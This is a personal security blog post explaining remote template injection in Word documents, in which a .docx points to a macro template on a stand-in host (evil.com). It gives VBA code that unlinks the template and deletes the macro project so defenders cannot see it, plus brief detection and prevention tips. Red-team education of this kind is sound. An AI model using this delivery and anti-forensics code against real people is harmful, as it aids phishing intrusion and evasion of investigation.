<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1">
  <meta name="generator" content="Jekyll">

  <title>VBA Macro Remote Template Injection With Unlinking & Self-Deletion</title>

  <link rel="stylesheet" href="/css/main.css">
  <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">
  <link href="/atom.xml" type="application/atom+xml" rel="alternate" title="ATOM Feed" /> <!-- Begin Jekyll SEO tag v2.6.1 -->
<title>VBA Macro Remote Template Injection With Unlinking &amp; Self-Deletion | John Woodman’s Security Blog</title>
<meta name="generator" content="Jekyll v4.1.1" />
<meta property="og:title" content="VBA Macro Remote Template Injection With Unlinking &amp; Self-Deletion" />
<meta name="author" content="John Woodman" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="One of the most common methods leveraged by attackers is the use of Malicious Word/Excel Documents sent over email. These malicious docs are embedded with macro VBA code that, when run, execute various tasks on the victim’s computer, usually resulting in RCE (Remote Code Execution) and/or data exfiltration." />
<meta property="og:description" content="One of the most common methods leveraged by attackers is the use of Malicious Word/Excel Documents sent over email. These malicious docs are embedded with macro VBA code that, when run, execute various tasks on the victim’s computer, usually resulting in RCE (Remote Code Execution) and/or data exfiltration." />
<meta property="og:site_name" content="John Woodman’s Security Blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2019-11-28T00:00:00+00:00" />
<script type="application/ld+json">
{"@type":"BlogPosting","headline":"VBA Macro Remote Template Injection With Unlinking &amp; Self-Deletion","dateModified":"2019-11-28T00:00:00+00:00","datePublished":"2019-11-28T00:00:00+00:00","mainEntityOfPage":{"@type":"WebPage","@id":"/posts/VBA-Macro-Remote-Template-Injection/"},"author":{"@type":"Person","name":"John Woodman"},"url":"/posts/VBA-Macro-Remote-Template-Injection/","description":"One of the most common methods leveraged by attackers is the use of Malicious Word/Excel Documents sent over email. These malicious docs are embedded with macro VBA code that, when run, execute various tasks on the victim’s computer, usually resulting in RCE (Remote Code Execution) and/or data exfiltration.","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->

</head>


<body>
  <div id="wrapper">
    <header>
  <div>
    <a href="/">
    
    <h1>john@home:~$</h1>
    </a>
    <div class="header-links">
      <a href="/archive"><h2 class="header-link">Archive</h2></a>
<a href="/about"><h2 class="header-link">About</h2></a>
<a href="/hackthebox"><h2 class="header-link">HackTheBox</h2></a>
<a href="/ctf"><h2 class="header-link">CTF</h2></a>
<a href="https://twitter.john-woodman.com" target="_blank"><h2 class="header-link">HackerTwitter</h2></a>
<a href="/gardening"><h2 class="header-link">Gardening</h2></a>
<a href="/atom.xml"><h2 class="header-link">RSS</h2></a>
<a href="https://twitter.com/JohnWoodman15" target="_blank"><h2 class="header-link"><img src="/assets/twitter.png" style="vertical-align:middle" width="45"/></h2></a>
<a href="https://github.com/JohnWoodman" target="_blank"><h2 class="header-link"><img src="/assets/github.png" style="vertical-align:middle; margin-left:-7px" width="45"/></h2></a>

    </div>
  </div>
</header>

    <div class="container">
      <section id="main_content">
        <article>
  <h1>VBA Macro Remote Template Injection With Unlinking & Self-Deletion</h1>
  <time datetime="2019-11-28T00:00:00+00:00" class="by-line">28 Nov 2019</time>
  <p>One of the most common methods leveraged by attackers is the use of Malicious Word/Excel Documents sent over email. These malicious docs are embedded with macro VBA code that, when run, execute various tasks on the victim’s computer, usually resulting in RCE (Remote Code Execution) and/or data exfiltration.</p>

<p>There are numerous techniques used on these malicious docs to bypass anti-virus detection (VBAStomping, obfuscation, etc.). One such method is Remote Template Injection.</p>

<h2 id="remote-template-injection"><a href="#header-1"></a>Remote Template Injection</h2>

<p>Word/Excel docs are made up of a collection of XML files all zipped together. You can actually unzip these docs by renaming the extension to .zip and extracting the contents as you would any zipped file. The XML file that we’re most interested in is settings.xml.rels located in the folder word_rels. However, if you unzipped just any document and looked for this file, it is likely that it won’t exist.</p>

<p>This is because settings.xml.rels exists only for documents that were created from a template. This isn’t a huge issue, just make sure when you create the document, that it’s based off a pre-made template (you can choose any of the default templates Microsoft already provides). While the rest of this post should still apply to both Word and Excel documents, I will be referring specifically to Word documents for the remainder of the post, as I have not tested all of this on Excel.</p>

<p>Below shows the contents of settings.xml.rels that you would typically find with most documents:</p>
<blockquote>
  <p>&lt;?xml version=”1.0” encoding=”UTF-8” standalone=”yes”?&gt;
&lt;Relationships xmlns=”http://schemas.openxmlformats.org/package/2006/relationships”&gt;&lt;Relationship Id=”rId1” Type=”http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate” Target=”file:////Users/johnwoodman/Library/Containers/com.microsoft.Word/Data/Library/Application%20Support/Microsoft/Office/16.0/DTS/en-US%7b95D41D06–9CC6-D74F-A607–2B7C0EB22DFC%7d/%7b33B4F4BC-0742–3849-AA14-CD5092D5B844%7dtf10002086.dotx” TargetMode=”External”/&gt;&lt;/Relationships&gt;</p>
</blockquote>

<p>The part to pay attention to is the “Target” attribute. At the moment, this attribute is pointing to a file on the local machine. What we are able to do is change the value so it points to a remote file, which will then be used as the template for that document. This template would contain the macros you want to be executed. You can specify either an HTTP(S) URL or a SMB address pointing to your template.</p>

<p>Below shows the contents of settings.xml.rels after it has been altered to point to a malicious web server containing a malicious word template:</p>
<blockquote>
  <p>&lt;?xml version=”1.0” encoding=”UTF-8” standalone=”yes”?&gt;
&lt;Relationships xmlns=”http://schemas.openxmlformats.org/package/2006/relationships”&gt;&lt;Relationship Id=”rId1” Type=”http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate” Target=”https://evil.com/malicious.dotm” TargetMode=”External”/&gt;&lt;/Relationships&gt;</p>
</blockquote>

<p>Once edited, all you have to do is re-zip the XML files and rename the extension to .docx. All that is left to do is send malicious doc to your “target” and once opened (and content is enabled) the template is pulled from the malicious web server and the macro code inside it is executed.</p>

<p>I created a <a href="https://github.com/JohnWoodman/remoteinjector">tool</a> that automates all this for you!</p>

<h2 id="unlinking--self-deletion"><a href="#header-2"></a>Unlinking &amp; Self-Deletion</h2>

<p>While Remote Template Injection can be very useful in evading anti-virus, once the template is run, the VBA code will remain in the document. This means if blue team gets ahold of the document, they can see all the malicious code that was executed.</p>

<p>The technique I found to get around this is by unlinking the template using VBA. The below snippet of VBA code shows how the unlinking is done, as well as how to prevent dialog boxes from popping up to the target user asking them to “Save Changes”.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Sub unlink()
    Application.DisplayAlerts = False
    On Error GoTo Destroy
    ThisDocument.AttachedTemplate.Saved = True
    CurrUser = Application.UserName
    tmpLoc = "C:\Users\" &amp; CurrUser &amp; "\AppData\Roaming\Microsoft\Templates\Normal.dotm"
    ActiveDocument.AttachedTemplate = tmpLoc
    ActiveDocument.AttachedTemplate.Saved = True
    ThisDocument.Saved = True
    ActiveDocument.Saved = True
    ThisDocument.Close savechanges:=False
Exit Sub
Destroy:
    Call ThisDocument.DeleteVBAPROJECT
    ThisDocument.Saved = True
    ActiveDocument.Saved = True
    ActiveDocument.AttachedTemplate.Saved = True
    ThisDocument.Close savechanges:=False
End Sub
</code></pre></div></div>

<p>Essentially, to unlink the current template you have to link the document to another template. In the above code, I am linking it to Normal.dotm, the default template found in every computer with Word installed.</p>

<p>The code in the “Destroy” section of the code is the self-deletion, essentially a fail-safe. If an error occurs in the unlinking process (either through Normal.dotm not existing, or another error that I will discuss below), then the function “DeleteVBAPROJECT” is called. This function deletes all the code in the template. Below is a snippet of that function’s code:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Sub DeleteVBAPROJECT()
    Application.DisplayAlerts = False
    Dim i As Long
    On Error Resume Next
    With ThisDocument.VBProject
        For i = .VBComponents.Count To 1 Step -1
            .VBComponents.Remove .VBComponents(i)
            .VBComponents(i).CodeModule.DeleteLines _
            1, .VBComponents(i).CodeModule.CountOfLines
        Next i
    End With
    On Error GoTo 0
    ThisDocument.Saved = True
    ActiveDocument.Saved = True
End Sub
</code></pre></div></div>

<p>This function serves only as a last-ditch effort if the unlinking method errors out.</p>

<p>To show that the Macro VBA code can not be viewed (at least not easily), the below image shows the VBA Editor of the malicious document before the macro has been run:</p>

<p><img src="/assets/2018-01-06-VBA-Macro-Remote-Template-Injection/1.png" alt="" /></p>

<p>You can see that the template “DocTemp” has been loaded into the document, but the VBA code itself has not. Even before the macro code is run, it is not view-able.</p>

<p>The following image shows the VBA Editor after the content has been enabled (note: in this scenario, the VBA Editor has not been opened prior to enabling content, the reason that is important is explained later):</p>

<p><img src="/assets/2018-01-06-VBA-Macro-Remote-Template-Injection/2.png" alt="" /></p>

<p>You can see the macro code from the template has been executed (popping calc.exe) and the template has successfully unlinked itself from the word document, no longer appearing in the VBA Editor.</p>

<p>As I referenced earlier, one of the errors that continued to happen with the unlink method occurred whenever I would open the malicious document, and then open and close the VBA Editor window. I am still unsure as to why simply opening the VBA Editor causes the unlink method to fail, but the self-deletion method is currently the best temporary solution, as it still gets rid of all lines of code that could be viewed by potential blue team.</p>

<p>The below image shows what remains if the VBA Editor is opened prior to enabling content:</p>

<p><img src="/assets/2018-01-06-VBA-Macro-Remote-Template-Injection/3.png" alt="" /></p>

<p>As you can see, the reference to DocTemp remains, however, all the VBA code has been deleted.</p>

<h2 id="detectionprevention"><a href="#header-3"></a>Detection/Prevention</h2>

<p>This method isn’t perfect. While I haven’t found anyway to view the actual Macro VBA code from the target side (both before and after enabling content), there are still ways to view the function names as well as the source URL that the template is being retrieved from. To view the function names:</p>

<ol>
  <li>Open the malicious document, but do not enable content.</li>
  <li>Select the “Macros” button in the Developer tab.</li>
</ol>

<p>This will give you the function names, but only the names. You will not be able to edit or step into these functions as they technically have not been loaded yet.</p>

<p>To view the source URL of the template:</p>

<ol>
  <li>Open the malicious document, but do not enable content.</li>
  <li>Select the “Document Template” button in the Developer tab.</li>
</ol>

<p>This will display the URL that the malicious document is grabbing the template from, allowing you to potentially retrieve the template from that URL yourself and be able to fully analyze the macro VBA code.</p>

<p>In terms of prevention, disabling the ability for Word/Excel documents to retrieve templates remotely would be the most effective against this type of attack.</p>

<h2 id="conclusion"><a href="#header-4"></a>Conclusion</h2>

<p>I made this post mostly to help me learn and better understand the security and inner workings behind Macros, but I hope it also gives insight into one of numerous techniques to evade anti-virus and static analysis, and also how to detect and prevent against it.</p>

<h2 id="references"><a href="#header-5"></a>References</h2>

<ul>
  <li><a href="http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html">Executing Macros From a DOCX With Remote Template Injection by BinaryFaultline</a></li>
</ul>


</article>

      </section>
    </div>
  </div>

   <footer>
  <a href="https://creativecommons.org/licenses/by-nc/3.0/deed.en_US">
    <span>
        <b>John Woodman</b>
    </span>
    
    <span>© 2020</span>
  </a>
</footer>

  
    <script type="text/javascript">
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-154967710-1', 'auto');
  ga('send', 'pageview');
</script>
  
</body>

</html>